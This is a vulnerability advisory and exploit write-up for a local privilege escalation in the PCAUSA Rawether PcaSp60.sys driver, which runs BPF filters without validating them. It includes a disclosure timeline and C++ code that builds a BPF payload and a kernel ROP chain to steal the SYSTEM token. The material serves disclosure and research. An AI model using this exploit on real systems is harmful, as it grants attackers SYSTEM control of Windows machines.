PCAUSA Rawether for Windows local privilege escalation

Rawether for Windows is a framework that facilitates communication between an application and the NDIS miniport driver. It’s produced by a company named Printing Communications Assoc., Inc. (PCAUSA), which seems to be no longer operating. The company websites can still be reached through web.archive.org:

http://web.archive.org/web/20151017034756/http://www.pcausa.com/
http://web.archive.org/web/20151128171809/http://www.rawether.net/

The Rawether framework provides an NDIS protocol driver similar to NPF.SYS (part of WinPcap). The framework is used by many hardware vendors in their WiFi and router control applications. The exploit attached to this advisory targets the 64-bit version of the PcaSp60.sys driver, which is part of ASUS PCE-AC56 WLAN Card Utilities.

Identifying other affected vendors is quite problematic: since Rawether is just a framework, the driver name, device name or driver version info may have been changed. Additionally, verifying whether a particular piece of software is really vulnerable is sometimes not feasible, because the installation package won’t install without specific hardware.

Default naming convention for the affected drivers:

  • PcaSp60.sys
  • PcaSp50.sys
  • PcaMp60.sys
  • PcaMp50.sys

Disclosure timeline

28 Oct 2016 Contacted tdivine@pcausa.com and security@asus.com
2 Nov 2016 ASUS asked for further details
23 Nov 2016 Received a beta version of ASUS PCE-AC56 WLAN Card Utilities that no longer uses the vulnerable driver
27 Nov 2016 Asked ASUS whether they also plan to fix other software that may use the vulnerable driver (if any)
7 Dec 2016 Tried contacting PCAUSA at a different e-mail address: pcausa@gmail.com
Jan-Feb 2017 Further fixes on the ASUS side; some packages are already fixed on the website
15 Mar 2017 Disclosure, ASUS has not fixed all packages

Technical Details

The PcaSp driver implements the Berkeley Packet Filter (BPF) mechanism:

https://www.kernel.org/doc/Documentation/networking/filter.txt

BPF filters are compiled into small programs that are executed by the BPF virtual machine. The BPF VM has two registers (the accumulator A and the index register X) and can perform simple load/store/branch/ALU operations:

  Instruction  Description
 
      ld           ;Load word into A
      ldi          ;Load word into A
      ldh          ;Load half-word into A
      ldb          ;Load byte into A
      ldx          ;Load word into X
      ldxi         ;Load word into X
      ldxb         ;Load byte into X
 
      st           ;Store A into M[]
      stx          ;Store X into M[]
 
      jmp          ;Jump to label
      ja           ;Jump to label
      jeq          ;Jump on A == k
      jneq         ;Jump on A != k
      jne          ;Jump on A != k
      jlt          ;Jump on A <  k
      jle          ;Jump on A <= k
      jgt          ;Jump on A >  k
      jge          ;Jump on A >= k
      jset         ;Jump on A &  k
 
      add          ;A + <x>
      sub          ;A - <x>
      mul          ;A * <x>
      div          ;A / <x>
      mod          ;A % <x>
      neg          ;!A
      and          ;A & <x>
      or           ;A | <x>
      xor          ;A ^ <x>
      lsh          ;A << <x>
      rsh          ;A >> <x>
 
      tax          ;Copy A into X
      txa          ;Copy X into A
 
      ret          ;Return
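
As a rough illustration of how these mnemonics turn into the numeric opcodes used later in the payload, the sketch below composes a few of them from the classic BPF opcode fields. The field values follow the classic BSD-style bpf.h; the namespace and the helper names (ldi, st, retk) are my own and are not taken from the Rawether or WinPcap sources.

```cpp
#include <cassert>
#include <cstdint>

// Classic BPF opcode fields (values as in the BSD-style bpf.h header).
namespace bpf {
// Instruction class: low 3 bits of the opcode.
constexpr uint16_t LD = 0x00, LDX = 0x01, ST = 0x02, STX = 0x03,
                   ALU = 0x04, JMP = 0x05, RET = 0x06, MISC = 0x07;
// Operand size for load instructions.
constexpr uint16_t W = 0x00, H = 0x08, B = 0x10;
// Addressing mode for load instructions.
constexpr uint16_t IMM = 0x00, ABS = 0x20, IND = 0x40, MEM = 0x60;
// Operand source for ALU, jump and return instructions.
constexpr uint16_t K = 0x00, X = 0x08;

// Hypothetical helpers: opcodes of the three instructions the payload needs.
constexpr uint16_t ldi()  { return LD | W | IMM; }  // A = k
constexpr uint16_t st()   { return ST; }            // M[k] = A
constexpr uint16_t retk() { return RET | K; }       // return k
}  // namespace bpf
```

With these definitions ldi, st and ret with a constant evaluate to 0, 2 and 6, which are the raw values that appear in the payload code further down.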

The exact implementation of the VM can be found in the WinPcap sources:

https://github.com/wireshark/winpcap/blob/master/packetNtx/driver/win_bpf.h
https://github.com/wireshark/winpcap/blob/master/packetNtx/driver/win_bpf_filter.c

The Rawether driver uses almost exactly the same code, with one small difference. WinPcap calls bpf_validate() whenever someone sets a packet filter program and refuses to install malformed filters. The validation routine performs standard memory load/store checks and simple control-flow checks that prevent endless loops and jumps outside of the BPF filter. During the filtering stage the BPF program is executed without those checks, since it relies on the one-time validation performed earlier. The Rawether driver doesn’t perform this validation, so it is possible to write a BPF program that reads or writes arbitrary memory (or just loops endlessly, which is not really interesting).
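
To make the missing step concrete, here is a minimal sketch of the kind of checks such a validation pass performs. It is not a copy of WinPcap’s bpf_validate(); the Insn struct and the validateSketch() name are hypothetical, and only the opcode field values and the 16-word scratch memory size come from classic BPF.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <vector>

struct Insn { uint16_t code; uint8_t jt; uint8_t jf; uint32_t k; };

constexpr uint32_t kMemWords = 16;  // BPF_MEMWORDS in classic BPF

// Returns true when the program stays inside its scratch memory, only jumps
// forward to instructions inside the program, and ends with a return.
bool validateSketch(const std::vector<Insn>& prog)
{
    const std::size_t n = prog.size();
    if (n == 0) return false;

    for (std::size_t i = 0; i < n; ++i) {
        const Insn& p = prog[i];
        const uint16_t cls  = p.code & 0x07;  // instruction class
        const uint16_t mode = p.code & 0xe0;  // addressing mode (loads)

        // Scratch-memory loads (LD/LDX with BPF_MEM) and all stores (ST/STX)
        // must index inside M[0..15].
        const bool memLoad  = (cls == 0x00 || cls == 0x01) && mode == 0x60;
        const bool memStore = (cls == 0x02 || cls == 0x03);
        if ((memLoad || memStore) && p.k >= kMemWords) return false;

        if (cls == 0x05) {  // BPF_JMP: offsets are unsigned, so jumps go forward
            if ((p.code & 0xf0) == 0x00) {  // ja: target is i + 1 + k
                if (uint64_t(i) + 1 + p.k >= n) return false;
            } else {                        // conditional: i + 1 + jt / jf
                if (uint64_t(i) + 1 + p.jt >= n) return false;
                if (uint64_t(i) + 1 + p.jf >= n) return false;
            }
        }
    }
    return (prog.back().code & 0x07) == 0x06;  // last instruction must be RET
}
```

A store to M[0x12], which is exactly what the payload described later relies on, would be rejected by the scratch-memory check in this sketch.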

The read/write address is relative to the current stack position, because the internal memory that a BPF program can access is just a local array of ints. On the x86 platform it is possible to access the full 32-bit address range. On x64, the exploit can reliably access only stack memory, which is sufficient to build a working ROP chain. Since a BPF program can write to any stack location, it is very easy to overwrite the return address without even touching the stack canary (which, by the way, this function doesn’t use).
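
The difference between the two platforms can be modelled with plain integer arithmetic. The sketch below assumes that the driver indexes the local int array with the unsigned 32-bit k operand, as the WinPcap code does (mem[pc->k]); the function names are hypothetical, and the 64-bit case is my reading of why only memory above the array is reachable.

```cpp
#include <cassert>
#include <cstdint>

// 32-bit pointers: mem + 4*k wraps modulo 2^32, so every address that has the
// same 4-byte alignment as mem can be reached.
constexpr uint32_t storeAddress32(uint32_t memBase, uint32_t k)
{
    return memBase + 4u * k;
}

// 64-bit pointers (assumption: k is zero-extended): only addresses from mem
// up to roughly 16 GiB above it can be reached, never anything below.
constexpr uint64_t storeAddress64(uint64_t memBase, uint32_t k)
{
    return memBase + 4ull * k;
}

// Finds the index k that makes a 32-bit store hit `target`, if one exists.
bool indexFor32(uint32_t memBase, uint32_t target, uint32_t& k)
{
    const uint32_t delta = target - memBase;  // unsigned wrap-around is intended
    if (delta % 4 != 0) return false;         // misaligned relative to mem
    k = delta / 4;
    return true;
}
```

For example, with mem at a high 32-bit address, indexFor32() still finds an index for a target below it, because the multiplication and addition wrap around. The same trick is not available with 64-bit pointers.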

I started building the payload by defining the writeStack() function:

struct bpf_insn
{
    unsigned __int16 code;
    char jt;
    char jf;
    unsigned int k;
    bpf_insn(unsigned __int16 code, char jt, char jf, unsigned int k) : code(code), jt(jt), jf(jf), k(k) {}
};
 
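// Emits BPF code that writes a 64-bit value into stack slot idx, counted
// from the bpf_filter() return address.
// Opcode 0 = BPF_LD|BPF_W|BPF_IMM (ldi), opcode 2 = BPF_ST (st).
void writeStack(std::vector<bpf_insn>& bytecode, int idx, uint64_t value)
{
    bytecode.emplace_back(bpf_insn(0, 0, 0, value & 0xFFFFFFFF));          // A = low 32 bits
    bytecode.emplace_back(bpf_insn(2, 0, 0, 0x12 + 2 * idx));              // M[0x12 + 2*idx] = A
    bytecode.emplace_back(bpf_insn(0, 0, 0, (value >> 32) & 0xFFFFFFFF));  // A = high 32 bits
    bytecode.emplace_back(bpf_insn(2, 0, 0, 0x12 + 2 * idx + 1));          // M[0x12 + 2*idx + 1] = A
}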

The above function emits 4 operations:

    ldi    (value & 0xFFFFFFFF)	; Load low 32bits of value into Accumulator
    st     [0x12 + 2*idx]	; Store Accumulator to memory at [0x12 + 2*idx]
    ldi    (value >> 32)	; Load hi 32bits of value into Accumulator
    st     [0x12 + 2*idx + 1]	; Store Accumulator to memory at [0x12 + 2*idx + 1]

0x12 is the size of the stack frame divided by 4 (the local memory is represented as an array of ints), so writeStack() can be used to overwrite the bpf_filter() return address and all stack frames above it.
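
The effect of these four instructions can be checked in user mode with a toy interpreter. The following is only a model under stated assumptions: the stack is a vector of 32-bit words in which words 0..15 stand for the BPF scratch memory and word 0x12 onwards stands for the return address and the frames above it. Insn, writeStackModel(), runUnchecked() and readSlot() are hypothetical names, and only the ldi, st and ret opcodes are implemented.

```cpp
#include <cassert>
#include <cstdint>
#include <vector>

struct Insn { uint16_t code; uint8_t jt, jf; uint32_t k; };

// Emits the same four instructions as writeStack() above.
void writeStackModel(std::vector<Insn>& prog, int idx, uint64_t value)
{
    prog.push_back({0, 0, 0, uint32_t(value & 0xFFFFFFFF)});  // ldi low
    prog.push_back({2, 0, 0, uint32_t(0x12 + 2 * idx)});      // st
    prog.push_back({0, 0, 0, uint32_t(value >> 32)});         // ldi high
    prog.push_back({2, 0, 0, uint32_t(0x12 + 2 * idx + 1)});  // st
}

// Executes ldi/st/ret without any BPF_MEMWORDS check, like the unvalidated
// filter. frame.at() only keeps the model itself memory-safe.
uint32_t runUnchecked(const std::vector<Insn>& prog, std::vector<uint32_t>& frame)
{
    uint32_t A = 0;
    for (const Insn& p : prog) {
        switch (p.code) {
        case 0: A = p.k; break;            // ldi: A = k
        case 2: frame.at(p.k) = A; break;  // st:  M[k] = A, k is not limited to 0..15
        case 6: return p.k;                // ret k
        default: return 0;                 // other opcodes are not modelled
        }
    }
    return 0;
}

// Reads back the 64-bit stack slot idx (low word first).
uint64_t readSlot(const std::vector<uint32_t>& frame, int idx)
{
    return uint64_t(frame.at(0x12 + 2 * idx)) |
           (uint64_t(frame.at(0x12 + 2 * idx + 1)) << 32);
}
```

Running a program built with writeStackModel(prog, 0, value) and a final ret against a frame of 64 words leaves value in slot 0, the modelled return address, while the words below index 0x12 stay untouched.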

I’ll briefly go through the ROP chain that I’ve created. The first stage of the ROP chain has to reset the spinlock that is acquired just before the call to bpf_filter():

  // !!! spinlock acquisition here !!!
  v17 = KeAcquireSpinLockRaiseToDpc(&ctx->W32NOpenListSpinLock.SpinLock);
 
  v18 = (_W32N_OPEN_CONTEXT *)ctx->W32NOpenList.Flink;
  ctx->W32NOpenListSpinLock.OldIrql = v17;
  while ( v18 && (_LIST_ENTRY *)v18 != &ctx->W32NOpenList )
  {
    if ( v18 && v18->bRxEnable && v18->nPacketFilter )
    {
      bpfProgram = v18->pBPFProgram;
      if ( bpfProgram && v18->nBPFProgramSize )
      {
        LODWORD(v31) = 0;
        v11 = (unsigned int)bpf_filter(bpfProgram, packetBuffer, packetBufferSizeOut, 0i64, v31, totalPacketSize) != 0;
      }
      else
      {
        v11 = 1;
      }
      if ( v11 )
      {
        v13 = v18;
        break;
      }
    }

or in assembly:

.text:00014A21 48 8D 4E 38           lea     rcx, [rsi+38h]  ; SpinLock
.text:00014A25 FF 15 DD 16 00 00     call    cs:__imp_KeAcquireSpinLockRaiseToDpc

To reset a KSPIN_LOCK it is sufficient to set the spin lock value to zero. The KSPIN_LOCK value is kept at [rsi + 0x38] during the whole bpf_filter() execution.

    int idx = 0;
    std::vector<bpf_insn> bytecode;
 
    // reset spinlock
 
    // mov    r14, address of any `pop register` gadget
    // mov    rcx, rsi    ; rsi points to the internal context structure
    // call   r14         ; calls `pop register` and proceeds to the next gadget
    // mov    dword ptr [rcx + 0x38], eax  ; eax is 0 at this point
 
    writeStack(bytecode, idx++, gogo.getSymbol(GadgetType::PopR14));
    writeStack(bytecode, idx++, gogo.getSymbol(GadgetType::PopRdx));
    writeStack(bytecode, idx++, gogo.getSymbol(GadgetType::MovRcxRsiCallR14));
    writeStack(bytecode, idx++, gogo.getSymbol("MovPtrRcx38Eax"));

In the next steps I’m getting the EPROCESS address of the process that will be elevated (via PsLookupProcessByProcessId) and the address of the “NT AUTHORITY\SYSTEM” EPROCESS (via PsGetCurrentProcess). bpf_filter() is called from NDIS_PROTOCOL_DRIVER_CHARACTERISTICS.ReceiveNetBufferListsHandler; from what I saw, this handler is called from an NDIS helper thread, so it runs with SYSTEM rights. Later, the ROP chain overwrites the target process token with the token stolen from the SYSTEM process and returns execution to the epilogue of ReceiveNetBufferListsHandler. The described method can be simplified, but I wrote this exploit before I finished the GoGoGadget library and without properly doing my homework on kernel information leaks. With EPROCESS information leaks in place, the calls to PsLookupProcessByProcessId and PsGetCurrentProcess can be skipped, and the ROP chain can just use the EPROCESS addresses gathered by the ring3 part of the exploit.

    // get current process EPROCESS
    writeStack(bytecode, idx++, gogo.getSymbol(GadgetType::PopRcx));
    writeStack(bytecode, idx++, myPID);
    writeStack(bytecode, idx++, gogo.getSymbol(GadgetType::PopRdx));
    writeStack(bytecode, idx++, pcaBase + 0x7400);
    writeStack(bytecode, idx++, gogo.getSymbol("ntoskrnl.exe", "PsLookupProcessByProcessId"));
    writeStack(bytecode, idx++, gogo.getSymbol("Pop4Times"));
    writeStack(bytecode, idx++, 0);
    writeStack(bytecode, idx++, 0);
    writeStack(bytecode, idx++, 0);
    writeStack(bytecode, idx++, 0);
 
    // get NT AUTHORITY\SYSTEM EPROCESS
    writeStack(bytecode, idx++, gogo.getSymbol("ntoskrnl.exe", "PsGetCurrentProcess"));
    writeStack(bytecode, idx++, gogo.getSymbol(GadgetType::PopRcx));
    writeStack(bytecode, idx++, 0x358);
    writeStack(bytecode, idx++, gogo.getSymbol(GadgetType::AddRaxRcx));
    writeStack(bytecode, idx++, gogo.getSymbol(GadgetType::MovRaxPtrRax));
 
    writeStack(bytecode, idx++, gogo.getSymbol(GadgetType::MovRbxRax));
 
    writeStack(bytecode, idx++, gogo.getSymbol(GadgetType::PopRax));
    writeStack(bytecode, idx++, pcaBase + 0x7400);
    writeStack(bytecode, idx++, gogo.getSymbol(GadgetType::MovRaxPtrRax));
    writeStack(bytecode, idx++, gogo.getSymbol(GadgetType::AddRaxRcx));
 
    writeStack(bytecode, idx++, gogo.getSymbol(GadgetType::PopR14));
    writeStack(bytecode, idx++, gogo.getSymbol(GadgetType::PopRdx));
    writeStack(bytecode, idx++, gogo.getSymbol(GadgetType::MovRcxRbxCallR14));
    writeStack(bytecode, idx++, gogo.getSymbol(GadgetType::MovPtrRaxRcx));
 
    // pcaBase + 0x4C89	-> restore registers (without rbx, but it seems to be ok in this case)
    writeStack(bytecode, idx++, pcaBase + 0x4C89);
 
    bytecode.emplace_back(bpf_insn(6, 0, 0, 0));	// opcode 6 = ret: return 0, so rax = 0 at the beginning of ROP execution

The last bytecode operation is “return 0”, so the bpf_filter() function sets the eax register to 0 at the end of the BPF program. I’m using this value to reset the spinlock at the beginning of the ROP chain.
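
Stripped of the gadget plumbing, the token-stealing part of the chain above boils down to one 64-bit copy between two EPROCESS structures. The sketch below models it in user mode on plain byte buffers. The 0x358 offset is the value used in the chain, while copyTokenModel() and the buffers are hypothetical stand-ins, not kernel code.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <vector>

constexpr std::size_t kTokenOffset = 0x358;  // offset added to EPROCESS in the chain

// Copies the 8-byte token field from the modelled SYSTEM EPROCESS into the
// modelled target EPROCESS. Returns false if a buffer is too small.
bool copyTokenModel(const std::vector<uint8_t>& systemEprocess,
                    std::vector<uint8_t>& targetEprocess)
{
    const std::size_t needed = kTokenOffset + sizeof(uint64_t);
    if (systemEprocess.size() < needed || targetEprocess.size() < needed)
        return false;

    uint64_t token = 0;
    // add rax, rcx ; mov rax, [rax] ; mov rbx, rax  -> read the SYSTEM token
    std::memcpy(&token, systemEprocess.data() + kTokenOffset, sizeof token);
    // mov rcx, rbx ; mov [rax], rcx                 -> overwrite the target token
    std::memcpy(targetEprocess.data() + kTokenOffset, &token, sizeof token);
    return true;
}
```

In the real chain the two EPROCESS addresses come from PsGetCurrentProcess and from the pointer that PsLookupProcessByProcessId stores at pcaBase + 0x7400.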

To enable the vulnerable part of the driver, the exploit has to issue an OID_GEN_CURRENT_PACKET_FILTER NDIS request with the NDIS_PACKET_TYPE_ALL_LOCAL flag and set the BPF program. The exploit is triggered by reading the first received network packet.

The PoC exploit was tested on Win10 x64 TH2 and RS1 and is available on GitHub:

https://github.com/rwfpl/rewolf-pcausa-exploit

It should work with PcaSp60.sys, SHA1: bd44ffa4784cc539c376fccef1315f461af8953e
